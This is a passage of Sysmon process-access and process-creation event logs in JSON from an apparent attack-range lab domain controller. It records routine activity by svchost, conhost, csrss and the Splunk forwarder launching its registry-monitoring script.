{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001013BA0500}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001013BA0500}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.546\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001006BC0500}\r\nProcessId: 4956\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.546","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001006BC0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001006BC0500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001006BC0500}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001006BC0500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001006BC0500}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 